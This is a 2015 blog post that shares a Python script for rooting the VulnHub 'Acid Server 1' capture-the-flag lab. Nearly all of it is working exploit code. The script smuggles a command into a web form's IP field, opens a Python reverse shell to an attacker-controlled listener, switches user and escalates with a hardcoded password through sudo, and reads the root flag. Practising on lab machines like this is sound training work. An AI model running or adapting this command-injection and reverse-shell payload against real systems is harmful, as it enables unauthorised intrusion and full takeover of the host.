Friday, August 21, 2015

Everybody Loves Acid.. Acid Sever 1, of course!

I've written a script which will root a fresh version of Acid ( https://www.vulnhub.com/entry/acid-server-1,125/).  It is pretty easy to follow along and finishes with a root shell.



from urllib import urlencode
import urllib
import urllib2
import socket
import sys
import threading
import time
rhost = "192.168.12.131"
rport = 33447
lhost = "192.168.12.129"
lport = 4444
revcmd = '1;python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'' % (lhost,lport)
postfields= {
'submit' : 1337,
'IP' : revcmd,
}
url = 'http://%s:%d/Challenge/Magic_Box/low.php' % ( rhost, rport)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
def get_all_response(client):
time.sleep(.5) # delays for 1 second
recv_len = 1
response = ""
while recv_len:
data = client.recv(100)
recv_len = len(data)
response+= data
#print recv_len
if recv_len < 100:
break
print response
return response
def loop_me(client):
print "dropping into root shell"
inpt = ""
while (inpt != "exit"):
inpt = raw_input("> ")
client.send(inpt+"\n")
get_all_response(client)
def rev_hndlr():
client_sock = False
#Bind socket to local host and port
try:
s.bind((lhost, lport))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete'
#Start listening on socket
s.listen(10)
print 'Socket now listening'
while not client_sock:
client_sock, addr = s.accept()
print "[==>] Received incoming connection from %s:%d" % (addr[0],addr[1])
get_all_response(client_sock)
client_sock.send("python -c 'import pty;pty.spawn(\"/bin/bash\") '\n")
get_all_response(client_sock)
client_sock.send("su saman\n")
get_all_response(client_sock)
print "1337hax0r"
client_sock.send("1337hax0r\n")
get_all_response(client_sock)
client_sock.send("sudo -i\n")
get_all_response(client_sock)
client_sock.send("1337hax0r\n")
print "1337hax0r"
get_all_response(client_sock)
client_sock.send("cat /root/flag.txt\n")
get_all_response(client_sock)
loop_me(client_sock)
def main():
rev_thread = threading.Thread(target=rev_hndlr)
rev_thread.start()
params = urlencode(postfields)
print params
print 'Params encoded'
print 'URL (%s) opening with params (%s)' % (url,urllib.unquote(params).decode('utf8') )
print urllib2.urlopen(url, data=params).read()
print 'URL (%s) opened' % (url)
main()
I'll see if I can get some comments put in there later. Thanks @m_avinash143 it was fun!

No comments:

Post a Comment